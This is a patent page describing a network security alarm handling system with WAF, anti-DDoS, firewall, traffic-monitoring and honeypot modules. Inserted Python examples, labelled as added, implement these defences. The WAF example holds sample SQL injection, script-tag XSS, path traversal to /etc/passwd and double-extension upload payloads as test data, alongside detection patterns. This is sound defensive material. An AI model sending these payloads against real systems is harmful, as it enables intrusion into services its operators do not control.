CN117614717A - Whole-flow handling system and method based on network security alarm event - Google Patents


Info

Publication number
CN117614717A
Authority
CN
China
Prior art keywords
unit
monitoring
responsible
flow
attack
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202311632947.XA
Other languages
Chinese (zh)
Inventor
张娜
曾智翔
曹璐
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Information Communication Branch of Hainan Power Grid Co Ltd
Original Assignee
Information Communication Branch of Hainan Power Grid Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Information Communication Branch of Hainan Power Grid Co Ltd
Priority to CN202311632947.XA
Publication of CN117614717A
Status: Pending (current)


Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 9/00 Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L 9/40 Network security protocols
    • H04L 41/00 Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks
    • H04L 41/06 Management of faults, events, alarms or notifications
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/02 Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L 63/0227 Filtering policies
    • H04L 63/0236 Filtering by address, protocol, port number or service, e.g. IP-address or URL
    • H04L 63/0245 Filtering by information in the payload
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L 63/1425 Traffic logging, e.g. anomaly detection
    • H04L 63/1433 Vulnerability analysis
    • H04L 63/1441 Countermeasures against malicious traffic
    • H04L 63/1458 Denial of Service
    • H04L 63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention discloses a whole-flow handling system based on network security alarm events. The system comprises an API monitoring module, an anti-DDoS module, a firewall module, a WAF module, a traffic monitoring module and a honeypot module. The API monitoring module is configured to perform interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring, and logging and reporting; the anti-DDoS module is configured to identify, filter, clean and monitor traffic entering the system in real time; the firewall module is configured to filter and block packets that do not conform to its rules and to inspect and filter data above the transport layer; the WAF module is configured to monitor and analyze the traffic of Web applications in real time; the traffic monitoring module is configured to acquire data packets from the network and analyze traffic behaviour; and the honeypot module is configured to simulate vulnerabilities and configuration problems of a real system or application in order to entice an attacker into the honeypot system.

Description

Whole-flow handling system and method based on network security alarm event
Technical Field
The invention relates to the technical field of network security alarms, and in particular to a whole-flow handling system and method based on network security alarm events.
Background
With the development of technology, cyberspace and physical space are ever more closely linked and the boundary between them is blurring; the reach of network attacks is expanding rapidly and the international network situation is becoming tense. Network security confrontation is increasingly taking on the character of warfare. Network security work has a complex background, a wide scope and fierce adversaries, and social engineering, new antivirus-evading Trojans and 0-day weapons have become the norm. To address these problems, more effective measures and strategies are needed to protect network security and the security of critical infrastructure.
Because alarm monitoring, analysis, handling and tracing are the responsibility of different professional teams, the prior art registers, updates and circulates network security alarm events in spreadsheets. Collecting, updating and sharing such files is difficult; the parties involved easily end up with inconsistent versions of the data; responsibilities are unclear; alarm events are missed or not updated in time; and handling of alarm events is delayed. The impact is especially large during important exercises or activities. To handle network security alarm events promptly in the face of efficient network attacks, and to ensure that alarm handling proceeds in an orderly way, a network security alarm event handling system needs to be developed to improve the management efficiency of network security alarm events.
Disclosure of Invention
The present invention is directed to a whole-flow handling system and method based on network security alarm events, and aims to solve the technical problems described in the background above.
To achieve the above object, the technical solution of the embodiments of the present invention is as follows. The invention discloses a whole-flow handling system based on network security alarm events, comprising an API monitoring module, an anti-DDoS (distributed denial of service) module, a firewall module, a WAF (Web application firewall) module, a traffic monitoring module and a honeypot module, wherein the API monitoring module is configured to perform interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring, and logging and reporting;
the anti-DDoS module is configured to identify, filter, clean, monitor and analyze traffic entering the system in real time, to distribute traffic evenly among a plurality of servers, and to authenticate and authorize users;
the firewall module is configured to filter and block packets that do not conform to its rules and to inspect and filter data above the transport layer;
the WAF module is configured to monitor and analyze the traffic of Web applications in real time;
the traffic monitoring module is configured to acquire data packets from the network and analyze traffic behaviour;
the honeypot module is configured to simulate vulnerabilities and configuration problems of a real system or application, entice an attacker into the honeypot system, and then collect and analyze information about the attacker's behaviour.
Optionally, the API monitoring module includes an interface availability monitoring unit, a performance monitoring unit, a security monitoring unit, an error monitoring unit, a business logic monitoring unit and a first log recording unit, wherein
the interface availability monitoring unit is configured to periodically check the availability of the API interfaces and verify returned indicators such as status codes and response times;
the performance monitoring unit is configured to measure performance indicators of the API and to simulate and send requests under different loads so as to evaluate performance bottlenecks and optimization needs of the API;
the security monitoring unit is configured to check the security of the API, monitor malicious behaviour, abnormal requests and potential security vulnerabilities, and provide real-time alarms and logging;
the error monitoring unit is configured to monitor error codes and error messages returned by the API and to check error messages in API responses so as to discover and handle error conditions in time;
the business logic monitoring unit is configured to verify whether the business logic of the API is correct, checking whether the behaviour and results of the API under various input conditions meet expectations;
the first log recording unit is configured to collect, record and analyze the monitored API data, generate reports and visual charts, and display the usage, performance indicators and fault conditions of the API.
Optionally, the anti-DDoS module comprises a first traffic analysis unit, a traffic cleaning unit, a load balancing unit, a first security authentication unit, a defense protocol unit and a second log recording unit, wherein
the first traffic analysis unit is configured to monitor and analyze traffic entering the system in real time and to identify and record the various types of traffic;
the traffic cleaning unit is configured to filter and clean traffic entering the system, removing malicious traffic and attack traffic from it;
the load balancing unit is configured to balance and distribute traffic among a plurality of servers, adjusting dynamically according to the performance and load of the servers so as to distribute traffic fairly;
the first security authentication unit is configured to authenticate and authorize users so as to prevent unauthorized access and attacks;
the defense protocol unit is configured to identify and block the various DDoS attack types, detecting and defending against attack traffic;
the second log recording unit is configured to collect, record and analyze anti-DDoS data.
Optionally, the firewall module comprises a packet filtering unit, an application layer proxy unit, a state tracking unit, a VPN unit, an IDS/IPS unit and a third log recording unit, wherein
the packet filtering unit is configured to inspect network packets and, according to a predefined rule set, filter and block packets that do not conform to the rules;
the application layer proxy unit is configured to inspect and filter data above the transport layer, examining and filtering the transmitted data;
the state tracking unit is configured to track the state of network connections, filter and authenticate according to that state, and detect and block unauthorized connections, malicious activity and abnormal behaviour;
the VPN unit is configured to establish and manage secure remote connections, encrypting and tunnelling data with an encryption algorithm;
the IDS/IPS unit is configured to detect and defend against intrusion activity, monitor network traffic and system logs, identify abnormal behaviour and malicious attacks, and trigger alarms or take automatic defensive measures;
the third log recording unit is configured to collect, record and analyze firewall data.
Optionally, the WAF module includes a second traffic analysis unit, a rule engine unit, a whitelist/blacklist unit, a second security authentication unit, a file upload/download unit, an abnormal behaviour detection unit, an API protection unit and a fourth log recording unit, wherein
the second traffic analysis unit is configured to monitor and analyze the traffic of Web applications in real time, analyzing at least the parameters, header information and payload characteristics of each request;
the rule engine unit is configured to check request and response data against a predefined rule set, identifying and filtering at least malicious requests, SQL injection, cross-site scripting and file inclusion attacks;
the whitelist/blacklist unit is configured to manage lists that allow or forbid specific IP addresses, users, URLs or HTTP methods to access the Web applications;
the second security authentication unit is configured to authenticate and authorize users so as to prevent unauthorized access and attacks;
the file upload/download unit is configured to check and control the security of file uploads and downloads, detecting the type and size of uploaded files and preventing the upload and download of malicious files;
the abnormal behaviour detection unit is configured to detect and block malicious behaviour by attackers;
the API protection unit is configured to protect the APIs from malicious behaviour and attacks;
the fourth log recording unit is configured to collect, record and analyze WAF data.
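As an added example, not code from the patent: the following Python sketch implements three of the WAF checks the units above describe, a whitelist/blacklist on source IP and HTTP method, a signature rule engine for SQL injection, cross-site scripting and file inclusion, and an upload check on file type and size. The request format, IP addresses, sample payloads and rule set are all constructed for the example, and the signature set is deliberately far smaller than a production rule set.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import unquote_plus


@dataclass
class Request:
    """One HTTP request as the WAF sees it (constructed for this example)."""
    src_ip: str
    method: str
    path: str
    query: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""
    upload_name: Optional[str] = None   # file name if the request carries an upload


# Signature rules applied to decoded parameter values (the rule engine unit).
# Deliberately small: production rule sets are far larger and more precise.
SIGNATURES = [
    ("sqli", re.compile(r"(?i)(\bunion\b\s+\bselect\b|'\s*or\s+'?\d+'?\s*=\s*'?\d+|--\s*$|\bsleep\s*\()")),
    ("xss",  re.compile(r"(?i)(<\s*script\b|javascript\s*:|\bon[a-z]+\s*=)")),
    ("lfi",  re.compile(r"(\.\./|\.\.\\|/etc/passwd|php://)")),
]
EXECUTABLE_EXT = {"php", "phtml", "jsp", "asp", "aspx", "exe", "sh"}


class Waf:
    def __init__(self, ip_blacklist=(), ip_whitelist=(), allowed_methods=("GET", "POST"),
                 blocked_paths=("/admin",), max_upload_bytes=1_000_000,
                 allowed_upload_ext=("png", "jpg", "pdf")):
        self.ip_blacklist = set(ip_blacklist)
        self.ip_whitelist = set(ip_whitelist)
        self.allowed_methods = set(allowed_methods)
        self.blocked_paths = tuple(blocked_paths)
        self.max_upload_bytes = max_upload_bytes
        self.allowed_upload_ext = set(allowed_upload_ext)

    def inspect(self, req: Request) -> List[str]:
        """Return the names of the rules the request violates; an empty list means allow."""
        if req.src_ip in self.ip_whitelist:
            return []   # whitelist short-circuits every other check, so keep it narrow
        reasons: List[str] = []
        if req.src_ip in self.ip_blacklist:
            reasons.append("ip_blacklisted")
        if req.method not in self.allowed_methods:
            reasons.append("method_" + req.method)
        if any(req.path.startswith(p) for p in self.blocked_paths):
            reasons.append("path_blocked")
        # Decode before matching: URL encoding is the first thing an attacker tries
        # against an engine that matches the raw bytes.
        values = [unquote_plus(v) for v in req.query.values()]
        values.append(unquote_plus(req.body.decode("utf-8", "replace")))
        values.extend(req.headers.get(h, "") for h in ("User-Agent", "Referer", "Cookie"))
        for name, rx in SIGNATURES:
            if any(rx.search(v) for v in values):
                reasons.append(name)
        if req.upload_name is not None:
            parts = req.upload_name.lower().split(".")[1:]
            # Check every extension, not only the last: shell.php.png must be rejected.
            if not parts or parts[-1] not in self.allowed_upload_ext or EXECUTABLE_EXT & set(parts):
                reasons.append("upload_ext")
            if len(req.body) > self.max_upload_bytes:
                reasons.append("upload_size")
        return reasons


# Constructed sample requests; 203.0.113.9 is a blacklisted source and 10.0.0.5 a whitelisted one.
SAMPLES = {
    "benign":    Request("198.51.100.7", "GET", "/search", {"q": "laptop"}),
    "sqli":      Request("198.51.100.7", "GET", "/search", {"q": "%27+OR+1%3D1+--"}),
    "xss":       Request("198.51.100.7", "POST", "/comment", body=b"text=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
    "lfi":       Request("198.51.100.7", "GET", "/download", {"file": "..%2F..%2Fetc%2Fpasswd"}),
    "blacklist": Request("203.0.113.9", "DELETE", "/api/users/1"),
    "upload":    Request("198.51.100.7", "POST", "/upload", body=b"\x89PNG\r\n\x1a\n", upload_name="avatar.php.png"),
    "whitelist": Request("10.0.0.5", "GET", "/admin", {"q": "%27+OR+1%3D1+--"}),
}


def build_waf() -> Waf:
    return Waf(ip_blacklist=["203.0.113.9"], ip_whitelist=["10.0.0.5"])


def classify_samples() -> Dict[str, List[str]]:
    waf = build_waf()
    return {name: waf.inspect(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:10s} -> {'allow' if not verdict else 'block ' + ','.join(verdict)}")
```

The whitelist short-circuit is exactly what the whitelist/blacklist unit above specifies, which is why the whitelisted request carrying an SQL injection payload is allowed through. In practice a whitelist should be limited to sources that are authenticated by other means, or applied per rule rather than to the whole engine.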
Optionally, the traffic monitoring module comprises a data acquisition unit, a third traffic analysis unit, a traffic statistics unit, an alarm and alert unit, a traffic reconstruction unit, a protocol identification unit, a network topology map unit and a fifth log recording unit, wherein
the data acquisition unit is configured to acquire data packets from the network and convert them into an analyzable format;
the third traffic analysis unit is configured to monitor and analyze the data packets in real time;
the traffic statistics unit is configured to count and analyze network traffic, classifying and aggregating it at least by time, direction and protocol;
the alarm and alert unit is configured to detect conditions of interest and trigger alarms and alerts;
the traffic reconstruction unit is configured to reconstruct and optimize normal network traffic so as to reduce the effect of an attacker's attack;
the protocol identification unit is configured to identify the protocols of the traffic in network communication;
the network topology map unit is configured to map and manage the physical and logical topology of the network;
the fifth log recording unit is configured to collect, record and analyze traffic monitoring data.
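As an added example, not from the patent: the Python below shows the data acquisition, protocol identification, traffic statistics and alarm units working together on constructed flow records. Protocols are identified from payload signatures first and from port numbers only as a fallback, statistics are aggregated by time bucket, direction and protocol, and an alert is raised when the identified protocol contradicts the port (for instance SSH on 443) or when outbound volume to a single external host exceeds a threshold. The internal address range, the flow records and the thresholds are assumptions made for the example.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumption: the monitored site's address space


@dataclass(frozen=True)
class Flow:
    """One flow record as produced by the data acquisition unit (constructed)."""
    ts: int          # epoch seconds of the first packet
    src: str
    dst: str
    dport: int
    nbytes: int
    head: bytes      # first payload bytes captured for protocol identification


# Payload signatures beat port numbers: a service on 443 is not TLS just because of the port.
SIGNATURES = [(b"\x16\x03", "tls"), (b"SSH-", "ssh"), (b"GET ", "http"), (b"POST ", "http")]
PORT_HINT = {443: "tls", 22: "ssh", 80: "http", 53: "dns"}


def identify_protocol(f: Flow) -> Tuple[str, bool]:
    """Return (protocol, matched_by_signature); port-based guesses are marked False."""
    for sig, name in SIGNATURES:
        if f.head.startswith(sig):
            return name, True
    return PORT_HINT.get(f.dport, "unknown"), False


def direction(f: Flow) -> str:
    s_in = ipaddress.ip_address(f.src) in INTERNAL
    d_in = ipaddress.ip_address(f.dst) in INTERNAL
    return "internal" if s_in and d_in else ("outbound" if s_in else "inbound")


def analyze(flows: List[Flow], bucket_s: int = 60, volume_threshold: int = 50_000_000):
    """Aggregate bytes by (time bucket, direction, protocol) and raise two kinds of alert."""
    stats: Dict[Tuple[int, str, str], int] = defaultdict(int)
    outbound_by_dst: Dict[str, int] = defaultdict(int)
    alerts: List[Tuple[str, str]] = []
    for f in flows:
        proto, by_sig = identify_protocol(f)
        d = direction(f)
        stats[(f.ts // bucket_s * bucket_s, d, proto)] += f.nbytes
        expected = PORT_HINT.get(f.dport)
        if by_sig and expected and proto != expected:   # e.g. SSH tunnelled over 443
            alerts.append(("protocol_mismatch",
                           f"{f.src}->{f.dst}:{f.dport} carries {proto}, expected {expected}"))
        if d == "outbound":
            outbound_by_dst[f.dst] += f.nbytes
    for dst, n in outbound_by_dst.items():
        if n > volume_threshold:                         # bulk transfer to one external host
            alerts.append(("outbound_volume", f"{n} bytes to {dst}"))
    return dict(stats), alerts


# Constructed flow records: normal TLS, an inbound HTTP request, SSH hidden on 443 with a
# 60 MB upload, an internal SSH session and a DNS query.
SAMPLE_FLOWS = [
    Flow(1700000000, "10.1.2.3", "93.184.216.34", 443, 4_200, b"\x16\x03\x01"),
    Flow(1700000010, "203.0.113.8", "10.1.2.10", 80, 900, b"GET /index.html"),
    Flow(1700000020, "10.1.2.3", "198.51.100.77", 443, 60_000_000, b"SSH-2.0-OpenSSH_8.9"),
    Flow(1700000070, "10.1.2.4", "10.1.2.10", 22, 3_000, b"SSH-2.0-OpenSSH_8.9"),
    Flow(1700000080, "10.1.2.5", "192.0.2.53", 53, 120, b"\x12\x34\x01\x00"),
]

if __name__ == "__main__":
    stats, alerts = analyze(SAMPLE_FLOWS)
    for key in sorted(stats):
        print(key, stats[key])
    for kind, detail in alerts:
        print("ALERT", kind, detail)
```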
Optionally, the honeypot module comprises a virtual machine environment unit, a service simulation unit, a threat intelligence unit, a data analysis and alarm unit, an attack reconstruction and analysis unit, an adaptive honeypot unit and a crossing honeypot unit, wherein
the virtual machine environment unit is configured to create a virtual machine environment and deploy honeypots in it;
the service simulation unit is configured to simulate various network services and deploy forged services in the honeypot so as to attract attackers;
the threat intelligence unit is configured to acquire and analyze threat intelligence and update the attack signature library in the honeypot so as to identify and block attacks;
the data analysis and alarm unit is configured to monitor and analyze data in the honeypot in real time, and to record and report the attack behaviour when an attacker attempts to access the honeypot;
the attack reconstruction and analysis unit is configured to reconstruct the attack process and analyze the attack techniques, recording the data traffic and command execution information during the attack;
the adaptive honeypot unit is configured to simulate vulnerabilities and configuration problems of a real system or application, trap the attacker in the honeypot system, and monitor and analyze the attack behaviour;
the crossing honeypot unit is configured to trap and monitor the attacker's activity.
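As an added example that is not part of the patent: a low-interaction service simulation in Python, the kind of forged service the service simulation unit would deploy. It presents a fake login, accepts any credentials, records every command line, extracts download URLs as indicators, and answers as if no tools were installed; the event list is what the data analysis and alarm unit and the attack reconstruction unit would consume. The banner text, prompts and the sample attacker session are constructed, and serve() exposes the same state machine on a TCP port for manual use.

```python
import re
from typing import List, Tuple

BANNER = b"Debian GNU/Linux 10\n"   # constructed decoy banner; pick one that matches the real fleet
Event = Tuple[str, str, str]          # (peer, kind, data)


class FakeShellSession:
    """State machine for one attacker connection: login prompt, password, then a fake shell
    that accepts every command, records it, and pretends nothing is installed."""

    def __init__(self, peer: str):
        self.peer = peer
        self.state = "user"
        self.user = ""
        self.events: List[Event] = [(peer, "connect", "")]

    def greeting(self) -> bytes:
        return BANNER + b"login: "

    def feed_line(self, line: bytes) -> bytes:
        text = line.decode("utf-8", "replace").strip()
        if self.state == "user":
            self.user, self.state = text, "password"
            return b"Password: "
        if self.state == "password":
            # Accept any credential pair: the pair itself is the intelligence we want.
            self.events.append((self.peer, "credentials", f"{self.user}:{text}"))
            self.state = "shell"
            return b"\nLast login: Mon Nov 13 09:12:44 from 10.0.0.1\n$ "
        if not text:
            return b"$ "
        self.events.append((self.peer, "command", text))
        # Download URLs inside commands are the most useful artefact a honeypot yields.
        for m in re.finditer(r"https?://[^\s'\"]+", text):
            self.events.append((self.peer, "ioc_url", m.group(0)))
        if text in ("exit", "logout"):
            self.state = "closed"
            return b"logout\n"
        return b"-bash: " + text.split()[0].encode() + b": command not found\n$ "

    def close(self) -> None:
        self.events.append((self.peer, "disconnect", ""))


def replay_session(peer: str, lines: List[bytes]) -> Tuple[List[Event], bytes]:
    """Drive one session from constructed attacker input; returns (events, transcript sent back)."""
    s = FakeShellSession(peer)
    out = [s.greeting()]
    for line in lines:
        out.append(s.feed_line(line))
        if s.state == "closed":
            break
    s.close()
    return s.events, b"".join(out)


def serve(host: str = "127.0.0.1", port: int = 2323) -> None:
    """Expose the session state machine on a TCP port (run this file directly to try it)."""
    import socketserver

    class Handler(socketserver.StreamRequestHandler):
        def handle(self):
            session = FakeShellSession("%s:%d" % self.client_address)
            self.wfile.write(session.greeting())
            for line in self.rfile:
                self.wfile.write(session.feed_line(line))
                if session.state == "closed":
                    break
            session.close()
            for event in session.events:
                print(*event)

    with socketserver.ThreadingTCPServer((host, port), Handler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Keeping the protocol logic in a transport-free state machine is what makes the honeypot testable offline and lets the same session logic be replayed from captured input by the attack reconstruction unit.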
The second aspect of the invention discloses a whole-flow handling method based on network security alarm events, applied to the handling system of any of the preceding claims, and comprising the following steps:
polling the security monitoring devices, including the WAF, the anti-DDoS device, the firewall and the traffic monitoring device, to obtain security alarm information;
screening out the high-risk attack alarm information from the security alarm information, performing a secondary screening and analysis of the high-risk attack alarm information, and judging whether the information is true;
when the high-risk attack alarm information is true, cyclically capturing the attack sources whose state is "to be blocked", executing the blocking operation on the boundary firewall and the anti-DDoS device, and blocking the attacking IP;
and generating and archiving a problem work order according to the security alarm information.
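The four steps above as an added worked example in Python, not the patent's own implementation. The device feeds, the attacker and target addresses, the rule used to judge an alarm "true" (a source alarmed on by at least two devices and not inside the site's own address range) and the blocking commands are all constructed assumptions; a deployment would replace the feed dictionary with device API calls and the BlockingDevices stub with the firewall and anti-DDoS management interfaces.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed alarm feeds standing in for the WAF, anti-DDoS device, firewall and traffic
# monitor that the method polls. Assumption: each device's alarms are already normalized.
FEEDS: Dict[str, List[dict]] = {
    "waf": [
        {"ts": "2023-11-28T09:00:05Z", "src_ip": "203.0.113.45", "type": "sql_injection", "severity": "high", "target": "10.0.0.10"},
        {"ts": "2023-11-28T09:00:09Z", "src_ip": "198.51.100.8", "type": "scanner", "severity": "low", "target": "10.0.0.10"},
    ],
    "anti_ddos": [
        {"ts": "2023-11-28T09:00:12Z", "src_ip": "203.0.113.77", "type": "syn_flood", "severity": "high", "target": "10.0.0.10"},
    ],
    "firewall": [
        {"ts": "2023-11-28T09:00:15Z", "src_ip": "203.0.113.45", "type": "port_scan", "severity": "medium", "target": "10.0.0.0/24"},
    ],
    "traffic_monitor": [
        {"ts": "2023-11-28T09:00:20Z", "src_ip": "203.0.113.77", "type": "syn_flood", "severity": "high", "target": "10.0.0.10"},
        {"ts": "2023-11-28T09:00:25Z", "src_ip": "10.0.0.7", "type": "brute_force", "severity": "high", "target": "10.0.0.12"},
    ],
}
HIGH_RISK_TYPES = {"sql_injection", "syn_flood", "webshell", "brute_force", "rce"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # never auto-block the site's own addresses


def poll(feeds: Dict[str, List[dict]]) -> List[dict]:
    """Step 1: poll every device in turn and tag each alarm with the device it came from."""
    return [dict(a, device=dev) for dev, alarms in feeds.items() for a in alarms]


def screen_high_risk(alarms: List[dict]) -> List[dict]:
    """Step 2a: keep only high-severity alarms of an attack type worth automatic action."""
    return [a for a in alarms if a["severity"] == "high" and a["type"] in HIGH_RISK_TYPES]


def secondary_screen(high: List[dict], all_alarms: List[dict]) -> Tuple[Dict[str, dict], List[Tuple[dict, str]]]:
    """Step 2b: judge which high-risk alarms are true. Here 'true' means the source was seen by
    at least two different devices and is not internal; anything else goes to an analyst."""
    devices_by_src = defaultdict(set)
    for a in all_alarms:
        devices_by_src[a["src_ip"]].add(a["device"])
    confirmed: Dict[str, dict] = {}     # attack source -> first alarm; these are "to be blocked"
    rejected: List[Tuple[dict, str]] = []
    for a in high:
        ip = ipaddress.ip_address(a["src_ip"])
        if any(ip in net for net in INTERNAL_NETS):
            rejected.append((a, "internal source: escalate to the host team instead of blocking"))
        elif len(devices_by_src[a["src_ip"]]) < 2:
            rejected.append((a, "seen by one device only: needs analyst review"))
        else:
            confirmed.setdefault(a["src_ip"], a)   # one decision per attack source
    return confirmed, rejected


class BlockingDevices:
    """Constructed stand-in for the boundary firewall and anti-DDoS device; records what it was told."""
    def __init__(self):
        self.firewall: List[str] = []
        self.anti_ddos: List[str] = []

    def block(self, ip: str) -> None:
        self.firewall.append(f"deny ip host {ip} any")      # hypothetical ACL syntax
        self.anti_ddos.append(f"blackhole {ip} ttl 86400")  # hypothetical device command


def build_work_order(alarm: dict, blocked: bool, analysis: str) -> dict:
    """Step 4: one work order covering the five links of the flow."""
    return {
        "id": f"WO-{alarm['ts'].replace('-', '').replace(':', '')}-{alarm['src_ip']}",
        "discovery":    {"device": alarm["device"], "ts": alarm["ts"]},
        "registration": {"type": alarm["type"], "severity": alarm["severity"], "target": alarm["target"]},
        "analysis":     analysis,
        "handling":     "attack source blocked on boundary firewall and anti-DDoS device" if blocked else "pending analyst action",
        "tracing":      {"attack_source": alarm["src_ip"]},
        "status":       "closed" if blocked else "open",
    }


def handle_cycle(feeds: Dict[str, List[dict]] = FEEDS) -> Tuple[List[dict], BlockingDevices]:
    """One polling cycle of the whole flow: poll, screen, confirm, block, archive."""
    devices = BlockingDevices()
    alarms = poll(feeds)
    confirmed, rejected = secondary_screen(screen_high_risk(alarms), alarms)
    orders: List[dict] = []
    for ip, alarm in confirmed.items():             # Step 3: block every confirmed source
        devices.block(ip)
        orders.append(build_work_order(alarm, True, "confirmed: alarmed by more than one device"))
    for alarm, why in rejected:
        orders.append(build_work_order(alarm, False, why))
    return orders, devices


if __name__ == "__main__":
    for order in handle_cycle()[0]:
        print(order["id"], order["status"], order["handling"])
```

Two design choices matter for automatic blocking: confirmed sources are keyed by IP, so a source that several devices alarm on produces one block and one work order rather than one per alarm, and internal addresses are never pushed to the boundary devices, since blocking them there achieves nothing and the alarm belongs to a different team.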
The beneficial effects of the invention are as follows: 1. Automatic polling captures the alarm information of the security devices, automatically extracts high-risk alarms and automatically blocks and disables the high-risk attack source IPs, greatly reducing the workload of the network security monitoring, analysis and handling staff; the workload of these professionals is reduced by more than 50% and their working intensity by more than 60%;
2. Handling of network security alarm events is standardized and digitized: management and control follow the whole flow of five links, namely alarm discovery, alarm registration, alarm analysis, alarm handling and alarm attack source tracing; alarm events are located quickly and their handling status can be updated; communication costs are greatly reduced; the timely handling rate of high-risk network security alarm events exceeds 98%, and the on-time rate of problem management and control also exceeds 98%.
Drawings
FIG. 1 is an overall block diagram of a system in an embodiment of the present application;
FIG. 2 is an overall block diagram of an Api monitoring module in an embodiment of the present application;
FIG. 3 is an overall block diagram of a DDOS resistant module in an embodiment of the present application;
FIG. 4 is an overall block diagram of a firewall module according to an embodiment of the disclosure;
fig. 5 is an overall block diagram of a WAF module in an embodiment of the disclosure;
FIG. 6 is an overall block diagram of a traffic monitoring module in an embodiment of the present application;
fig. 7 is an overall block diagram of a honeypot module in an embodiment of the application.
Reference numerals: 1 API monitoring module, 101 interface availability monitoring unit, 102 performance monitoring unit, 103 security monitoring unit, 104 error monitoring unit, 105 business logic monitoring unit, 106 first log recording unit; 2 anti-DDoS module, 201 first traffic analysis unit, 202 traffic cleaning unit, 203 load balancing unit, 204 first security authentication unit, 205 defense protocol unit, 206 second log recording unit; 3 firewall module, 301 packet filtering unit, 302 application layer proxy unit, 303 state tracking unit, 304 VPN unit, 305 IDS/IPS unit, 306 third log recording unit; 4 WAF module, 401 second traffic analysis unit, 402 rule engine unit, 403 whitelist/blacklist unit, 404 second security authentication unit, 405 file upload/download unit, 406 abnormal behaviour detection unit, 407 API protection unit, 408 fourth log recording unit; 5 traffic monitoring module, 501 data acquisition unit, 502 third traffic analysis unit, 503 traffic statistics unit, 504 alarm and alert unit, 505 traffic reconstruction unit, 506 protocol identification unit, 507 network topology map unit, 508 fifth log recording unit; 6 honeypot module, 601 virtual machine environment unit, 602 service simulation unit, 603 threat intelligence unit, 604 data analysis and alarm unit, 605 attack reconstruction and analysis unit, 606 adaptive honeypot unit, 607 crossing honeypot unit.
Detailed Description
The technical scheme of the invention is further elaborated below by referring to the drawings in the specification and the specific embodiments. Unless defined otherwise, all technical and scientific terms used herein have the same meaning as commonly understood by one of ordinary skill in the art to which this invention belongs. The terminology used herein in the description of the invention is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. In the following description, reference is made to the expression "some embodiments" which describe a subset of all possible embodiments, but it should be understood that "some embodiments" may be the same subset or a different subset of all possible embodiments and may be combined with each other without conflict.
In the following description, numerous specific details are set forth in order to provide a more thorough understanding of the present invention. It will be apparent, however, to one skilled in the art that the invention may be practiced without one or more of these details. In other instances, well-known features have not been described in detail in order to avoid obscuring the invention.
It should be understood that the present invention may be embodied in various forms and should not be construed as limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the invention to those skilled in the art. And the terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used herein, the singular forms "a", "an" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It will be further understood that the terms "comprises" and/or "comprising," when used in this specification, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof. As used herein, the term "and/or" includes any and all combinations of the associated listed items.
It will be further understood that when an element is referred to as being "fixed to" another element, it can be directly on the other element or intervening elements may also be present. When an element is referred to as being "connected" to another element, it can be directly connected to the other element or intervening elements may also be present. The terms "vertical," "horizontal," "inner," "outer," "left," "right," and the like are used herein for illustrative purposes only and are not meant to be the only embodiment.
In order to provide a thorough understanding of the present invention, detailed structures will be presented in the following description in order to illustrate the technical solutions presented by the present invention. Alternative embodiments of the invention are described in detail below, however, the invention may have other implementations in addition to these detailed descriptions.
Referring to FIG. 1, the first aspect of the present invention discloses a whole-flow handling system based on network security alarm events. The system comprises an API monitoring module 1, an anti-DDoS module 2, a firewall module 3, a WAF module 4, a traffic monitoring module 5 and a honeypot module 6. The API monitoring module 1 is configured to perform interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring, and logging and reporting;
the anti-DDoS module 2 is configured to identify, filter, clean, monitor and analyze traffic entering the system, to distribute traffic evenly among a plurality of servers, and to authenticate and authorize users;
the firewall module 3 is configured to filter and block packets that do not conform to its rules and to inspect and filter data above the transport layer;
the WAF module 4 is configured to monitor and analyze the traffic of Web applications in real time;
the traffic monitoring module 5 is configured to acquire data packets from the network and analyze traffic behaviour;
the honeypot module 6 is configured to simulate vulnerabilities and configuration problems of a real system or application, entice an attacker into the honeypot system, and then collect and analyze information about the attack.
